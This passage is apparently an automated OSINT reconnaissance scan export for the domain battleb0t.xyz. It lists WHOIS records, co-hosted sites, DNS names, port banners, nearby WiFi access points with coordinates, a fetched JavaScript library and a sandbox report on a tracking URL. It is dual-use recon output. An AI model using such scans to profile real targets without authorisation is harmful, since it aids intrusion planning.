data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:54:18 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | pics.battleb0t.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.160): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:33 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0080004.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitec-a53131 (Net ID: 00:01:8E:A5:31:30) | 37.780462,-122.390564 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00-evan.github.io | 185.199.111.153 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0065paula.github.io]
https://www.openphish.com/feed.txt | 0065paula.github.io |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 30 | 1 | 1 | 0 | None | pics.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 118.48.229.35.bc.googleusercontent.com | 35.229.48.118 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 112.48.229.35.bc.googleusercontent.com | 35.229.48.112 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:65:D0) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | padt-1 (Net ID: 00:01:21:1F:7B:30) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-cache: HIT | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | sni.cloudflaressl.com | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TechAir (Net ID: 00:01:21:30:60:FD) | 41.8781, -87.6298 |
| 2023-05-12 02:54:19 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /**
* dat-gui JavaScript Controller Library
* http://code.google.com/p/dat-gui
*
* Copyright 2011 Data Arts Team, Google Creative Lab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*/
!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t(e.dat={})}(this,function(e){"use strict";function t(e,t){var n=e.__state.conversionName.toString(),o=Math.round(e.r),i=Math.round(e.g),r=Math.round(e.b),s=e.a,a=Math.round(e.h),l=e.s.toFixed(1),d=e.v.toFixed(1);if(t||"THREE_CHAR_HEX"===n||"SIX_CHAR_HEX"===n){for(var c=e.hex.toString(16);c.length<6;)c="0"+c;return"#"+c}return"CSS_RGB"===n?"rgb("+o+","+i+","+r+")":"CSS_RGBA"===n?"rgba("+o+","+i+","+r+","+s+")":"HEX"===n?"0x"+e.hex.toString(16):"RGB_ARRAY"===n?"["+o+","+i+","+r+"]":"RGBA_ARRAY"===n?"["+o+","+i+","+r+","+s+"]":"RGB_OBJ"===n?"{r:"+o+",g:"+i+",b:"+r+"}":"RGBA_OBJ"===n?"{r:"+o+",g:"+i+",b:"+r+",a:"+s+"}":"HSV_OBJ"===n?"{h:"+a+",s:"+l+",v:"+d+"}":"HSVA_OBJ"===n?"{h:"+a+",s:"+l+",v:"+d+",a:"+s+"}":"unknown format"}function n(e,t,n){Object.defineProperty(e,t,{get:function(){return"RGB"===this.__state.space?this.__state[t]:(I.recalculateRGB(this,t,n),this.__state[t])},set:function(e){"RGB"!==this.__state.space&&(I.recalculateRGB(this,t,n),this.__state.space="RGB"),this.__state[t]=e}})}function o(e,t){Object.defineProperty(e,t,{get:function(){return"HSV"===this.__state.space?this.__state[t]:(I.recalculateHSV(this),this.__state[t])},set:function(e){"HSV"!==this.__state.space&&(I.recalculateHSV(this),this.__state.space="HSV"),this.__state[t]=e}})}function i(e){if("0"===e||S.isUndefined(e))return 0;var t=e.match(U);return S.isNull(t)?0:parseFloat(t[1])}function r(e){var t=e.toString();return t.indexOf(".")>-1?t.length-t.indexOf(".")-1:0}function s(e,t){var n=Math.pow(10,t);return Math.round(e*n)/n}function a(e,t,n,o,i){return o+(e-t)/(n-t)*(i-o)}function l(e,t,n,o){e.style.background="",S.each(ee,function(i){e.style.cssText+="background: "+i+"linear-gradient("+t+", "+n+" 0%, "+o+" 100%); "})}function d(e){e.style.background="",e.style.cssText+="background: -moz-linear-gradient(top, #ff0000 0%, #ff00ff 17%, #0000ff 34%, #00ffff 50%, #00ff00 67%, #ffff00 84%, #ff0000 100%);",e.style.cssText+="background: -webkit-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: -o-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: -ms-linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);",e.style.cssText+="background: linear-gradient(top, #ff0000 0%,#ff00ff 17%,#0000ff 34%,#00ffff 50%,#00ff00 67%,#ffff00 84%,#ff0000 100%);"}function c(e,t,n){var o=document.createElement("li");return t&&o.appendChild(t),n?e.__ul.insertBefore(o,n):e.__ul.appendChild(o),e.onResize(),o}function u(e){X.unbind(window,"resize",e.__resizeHandler),e.saveToLocalStorageIfPossible&&X.unbind(window,"unload",e.saveToLocalStorageIfPossible)}function _(e,t){var n=e.__preset_select[e.__preset_select.selectedIndex];n.innerHTML=t?n.value+"*":n.value}function h(e,t,n){if(n.__li=t,n.__gui=e,S.extend(n,{options:function(t){if(arguments.length>1){var o=n.__li.nextElementSibling;return n.remove(),f(e,n.object,n.property,{before:o,factoryArgs:[S.toArray(arguments)]})}if(S.isArray(t)||S.isObject(t)){var i=n.__li.nextElementSibling;return n.remove(),f(e,n.object,n.property,{before:i,factoryArgs:[t]})}},name:function(e){return n.__li.firstElementChild.firstElementChild.innerHTML=e,n},listen:function(){return n.__gui.listen(n),n},remove:function(){return n.__gui.remove(n),n}}),n instanceof q){var o=new Q(n.object,n.property,{min:n.__min,max:n.__max,step:n.__step});S.each(["updateDisplay","onChange","onFinishChange","step"],function(e){var t=n[e],i=o[e];n[e]=o[e]=function(){var e=Array.prototype.slice.call(arguments);return i.apply(o,e),t.apply(n,e)}}),X.addClass(t,"has-slider"),n.domElement.insertBefore(o.domElement,n.domElement.firstElementChild)}else if(n instanceof Q){var i=function(t){if(S.isNumber(n.__min)&&S.isNumber(n.__max)){var o=n.__li.firstElementChild.firstElementChild.innerHTML,i=n.__gui.__listening.indexOf(n)>-1;n.remove();var r=f(e,n.object,n.property,{before:n.__li.nextElementSibling,factoryArgs:[n.__min,n.__max,n.__step]});return r.name(o),i&&r.listen(),r}return t};n.min=S.compose(i,n.min),n.max=S.compose(i,n.max)}else n instanceof K?(X.bind(t,"click",function(){X.fakeEvent(n.__checkbox,"click")}),X.bind(n.__checkbox,"click",function(e){e.stopPropagation()})):n instanceof Z?(X.bind(t,"click",function(){X.fakeEvent(n.__button,"click")}),X.bind(t,"mouseover",function(){X.addClass(n.__button,"hover")}),X.bind(t,"mouseout",function(){X.removeClass(n.__button,"hover")})):n instanceof $&&(X.addClass(t,"color"),n.updateDisplay=S.compose(function(e){return t.style.borderLeftColor=n.__color.toString(),e},n.updateDisplay),n.updateDisplay());n.setValue=S.compose(function(t){return e.getRoot().__preset_select&&n.isModified()&&_(e.getRoot(),!0),t},n.setValue)}function p(e,t){var n=e.getRoot(),o=n.__rememberedObjects.indexOf(t.object);if(-1!==o){var i=n.__rememberedObjectIndecesToControllers[o];if(void 0===i&&(i={},n.__rememberedObjectIndecesToControllers[o]=i),i[t.property]=t,n.load&&n.load.remembered){var r=n.load.remembered,s=void 0;if(r[e.preset])s=r[e.preset];else{if(!r[se])return;s=r[se]}if(s[o]&&void 0!==s[o][t.property]){var a=s[o][t.property];t.initialValue=a,t.setValue(a)}}}}function f(e,t,n,o){if(void 0===t[n])throw new Error('Object "'+t+'" has no property "'+n+'"');var i=void 0;if(o.color)i=new $(t,n);else{var r=[t,n].concat(o.factoryArgs);i=ne.apply(e,r)}o.before instanceof z&&(o.before=o.before.__li),p(e,i),X.addClass(i.domElement,"c");var s=document.createElement("span");X.addClass(s,"property-name"),s.innerHTML=i.property;var a=document.createElement("div");a.appendChild(s),a.appendChild(i.domElement);var l=c(e,a,o.before);return X.addClass(l,he.CLASS_CONTROLLER_ROW),i instanceof $?X.addClass(l,"color"):X.addClass(l,H(i.getValue())),h(e,l,i),e.__controllers.push(i),i}function m(e,t){return document.location.href+"."+t}function g(e,t,n){var o=document.createElement("option");o.innerHTML=t,o.value=t,e.__preset_select.appendChild(o),n&&(e.__preset_select.selectedIndex=e.__preset_select.length-1)}function b(e,t){t.style.display=e.useLocalStorage?"block":"none"}function v(e){var t=e.__save_row=document.createElement("li");X.addClass(e.domElement,"has-save"),e.__ul.insertBefore(t,e.__ul.firstChild),X.addClass(t,"save-row");var n=document.createElement("span");n.innerHTML=" ",X.addClass(n,"button gears");var o=document.createElement("span");o.innerHTML="Save",X.addClass(o,"button"),X.addClass(o,"save");var i=document.createElement("span");i.innerHTML="New",X.addClass(i,"button"),X.addClass(i,"save-as");var r=document.createElement("span");r.innerHTML="Revert",X.addClass(r,"button"),X.addClass(r,"revert");var s=e.__preset_select=document.createElement("select");if(e.load&&e.load.remembered?S.each(e.load.remembered,function(t,n){g(e,n,n===e.preset)}):g(e,se,!1),X.bind(s,"change",function(){for(var t=0;t<e.__preset_select.length;t++)e.__preset_select[t].innerHTML=e.__preset_select[t].value;e.preset=this.value}),t.appendChild(s),t.appendChild(n),t.appendChild(o),t.appendChild(i),t.appendChild(r),ae){var a=document.getElementById("dg-local-explain"),l=document.getElementById("dg-local-storage");document.getElementById("dg-save-locally").style.display="block","true"===localStorage.getItem(m(e,"isLocal"))&&l.setAttribute("checked","checked"),b(e,a),X.bind(l,"change",function(){e.useLocalStorage=!e.useLocalStorage,b(e,a)})}var d=document.getElementById("dg-new-constructor");X.bind(d,"keydown",function(e){!e.metaKey||67!==e.which&&67!==e.keyCode||le.hide()}),X.bind(n,"click",function(){d.innerHTML=JSON.stringify(e.getSaveObject(),void 0,2),le.show(),d.focus(),d.select()}),X.bind(o,"click",function(){e.save()}),X.bind(i,"click",function(){var t=prompt("Enter a new preset name.");t&&e.saveAs(t)}),X.bind(r,"click",function(){e.revert()})}function y(e){function t(t){return t.preventDefault(),e.width+=i-t.clientX,e.onResize(),i=t.clientX,!1}function n(){X.removeClass(e.__closeButton,he.CLASS_DRAG),X.unbind(window,"mousemove",t),X.unbind(window,"mouseup",n)}function o(o){return o.preventDefault(),i=o.clientX,X.addClass(e.__closeButton,he.CLASS_DRAG),X.bind(window,"mousemove",t),X.bind(window,"mouseup",n),!1}var i=void 0;e.__resize_handle=document.createElement("div"),S.extend(e.__resize_handle.style,{width:"6px",marginLeft:"-3px",height:"200px",cursor:"ew-resize",position:"absolute"}),X.bind(e.__resize_handle,"mousedown",o),X.bind(e.__closeButton,"mousedown",o),e.domElement.insertBefore(e.__resize_handle,e.domElement.firstElementChild)}function w(e,t){e.domElement.style.width=t+"px",e.__save_row&&e.autoPlace&&(e.__save_row.style.width=t+"px"),e.__closeButton&&(e.__closeButton.style.width=t+"px")}function x(e,t){var n={};return S.each(e.__rememberedObjects,function(o,i){var r={},s=e.__rememberedObjectIndecesToControllers[i];S.each(s,function(e,n){r[n]=t?e.initialValue:e.getValue()}),n[i]=r}),n}function E(e){for(var t=0;t<e.__preset_select.length;t++)e.__preset_select[t].value===e.preset&&(e.__preset_select.selectedIndex=t)}function C(e){0!==e.length&&oe.call(window,function(){C(e)}),S.each(e,function(e){e.updateDisplay()})}var A=Array.prototype.forEach,k=Array.prototype.slice,S={BREAK:{},extend:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(t[n])||(e[n]=t[n])}.bind(this))},this),e},defaults:function(e){return this.each(k.call(arguments,1),function(t){(this.isObject(t)?Object.keys(t):[]).forEach(function(n){this.isUndefined(e[n])&&(e[n]=t[n])}.bind(this))},this),e},compose:function(){var e=k.call(arguments);return function(){for(var t=k.call(arguments),n=e.length-1;n>=0;n--)t=[e[n].apply | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:45:43 | Physical Coordinates | No | AbstractAPI | 92 | 0 | 2 | 0 | None | 37.7642, -122.3993 | 185.199.109.153 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 228.30.196.104.bc.googleusercontent.com | 104.196.30.228 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c599e10cab22234-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:46:42 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://url9846.privacybee.com/ls/click?upn=EySNPXCrbC8jDMVbJIo3ruvsNxs9Q1wvX1DDgtu1zWhbWsG0ZNo2ntDLlVBRnuNZS1EHjb7YhPU-2FrYIpzus7G6DZO3SeOLRvy65jBggU2ZCMQANI-2F-2FCHUgnRMsoG6kxqMyXH_etjgfWM5SMHZD0h0E0Jd-2B9mJe66G0Oql262yICXvCc9CouJqkjMTNb-2BR2wPe9vTfbxdtxGVuf9-2FvvmffNk0vlONiXOjubbfNYZwoi2DS-2Bd7CnzdW5ZjLPhIWQLdSolBEbvPNu-2BH0gl1QQh-2F8uE2tTVmV-2BF4bB-2BAcHT8kZ11hfCkGH6A6HsgUipE64nK1Ol1Krt49Tl8Fn8VWYdwq503npI8YK8-2BBlYdNA8gTXmui3kA-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6732:120:WilError_01"\n "Local\\SM0:6992:304:WilStaging_02"\n "Local\\SM0:6992:120:WilError_01"\n "SM0:6992:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6732:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:6732:304:WilStaging_02"\n "Local\\SM0:6732:304:WilStaging_02"\n "SM0:6732:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6732:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6732:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6732:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.123.124:49729"\n "104.26.6.190:49733"\n "142.250.191.42:49734"\n "104.18.11.207:49735"\n "104.17.24.14:49736"\n "69.16.175.42:49737"\n "185.199.111.153:49738"\n "104.19.188.97:49743"\n "172.217.12.99:49745"\n "172.64.144.98:49747"\n "142.250.72.200:49749"\n "142.250.189.206:49750"\n "157.240.22.25:49751"\n "104.17.211.204:49752"\n "142.250.191.46:49753"\n "142.250.141.156:49754"\n "104.17.239.204:49756"\n "104.17.131.171:49757"\n "104.17.68.176:49758"\n "104.18.33.171:49759"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.hubspot.com"\n "app.hubspot.com"\n "cookiepedia.co.uk"\n "js.hs-banner.com"\n "kenwheeler.github.io"\n "metrics-fe-na1.hubspot.com"\n "privacybee.com"\n "privacyportal.onetrust.com"\n "static.hsappstatic.net"\n "track.hubspot.com"\n "url9846.privacybee.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006732]\n "f_00024d" has type "data"- [targetUID: N/A]\n "21a917b2-c020-414a-8a46-b06a11ded1ca.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\21a917b2-c020-414a-8a46-b06a11ded1ca.tmp]- [targetUID: 00000000-00004716]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006732]\n "f_00023e" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004716]\n "Tabs_13323379254486290" has type "data"- [targetUID: N/A]\n "364126ff-45e7-46b0-9183-daae5e7f3b44.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\364126ff-45e7-46b0-9183-daae5e7f3b44.tmp]- [targetUID: 00000000-00006732]\n "f_000243" has type "Web Open Font Format (Version 2) TrueType length 77160 version 4.459"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006732]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma\\LICENSE]- [targetUID: 00000000-00006732]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006732]\n "f_00023d" has type "data"- [targetUID: N/A]\n "c18a3bba-8e02-4569-80ed-ecfae57fd29d.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\c18a3bba-8e02-4569-80ed-ecfae57fd29d.tmp]- [targetUID: 00000000-00006732]\n "712786b6bbe95282_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\712786b6bbe95282_0]- [targetUID: 00000000-00006732]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6732_2117867855\\Filtering Rules-AA]- [targetUID: 00000000-00006732]\n "cf7c5ebe62e62da8_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\cf7c5ebe62e62da8_0]- [targetUID: 00000000-00006732]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006732]\n "4096c652-30d7-464d-9d7a-20dde7d02eca.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Last Browser" has type "data"- [targetUID: N/A]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\6732_28558427\\typosquatting_list.pb]- [targetUID: 00000000-00006732]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "http://url9846.privacybee.com/ls/click?upn=EySNPXCrbC8jDMVbJIo3ruvsNxs9Q1wvX1DDgtu1zWhbWsG0ZNo2ntDLlVBRnuNZS1EHjb7YhPU-2FrYIpzus7G6DZO3SeOLRvy65jBggU2ZCMQANI-2F-2FCHUgnRMsoG6kxqMyXH_etjgfWM5SMHZD0h0E0Jd-2B9mJe66G0Oql262yICXvCc9CouJqkjMTNb-2BR2wPe9vTfbxdtxG"\n Heuristic match: "api.hubspot.com"\n Heuristic match: "app.hubspot.com"\n Heuristic match: "cookiepedia.co.uk"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "http://url9846.privacybee.com"\n Heuristic match: "js.hs-banner.com"\n Heuristic match: "kenwheeler.github.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "metrics-fe-na1.hubspot.com"\n Heuristic match: "privacybee.com"\n Heuristic match: "privacyportal.onetrust.com"\n Heuristic match: "static.hsappstatic.net"\n Heuristic match: "track.hubspot.com"\n Heuristic match: "url9846.privacybee.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://dns.google,supports_spdy:true},{isolation:[],server:https://edgeassetservice.azureedge.net,supports_spdy:true},{isolation:[],server:https://edge.microsoft.com,supports_spdy:true},{isolation:[],server:https://arc.msn.com,su"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_checkout_page_validator.js]- [targetUID: 00000000-00006732]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6732_776219200\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00006732]\n "edge_driver.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\edge_driver.js]- [targetUID: 00000000-00006732]\n "adblock_snippet.js" has type "Unknown"- Location: [%TEMP%\\6732_2117867855\\adblock_snippet.js]- [targetUID: 00000000-00006732]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\shopping_iframe_driver.js]- [targetUID: 00000000-00006732]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\6732_776219200\\edge_tracking_page_validator.js]- [targetUI | 185.199.111.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | Domain Names REG.RU, LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
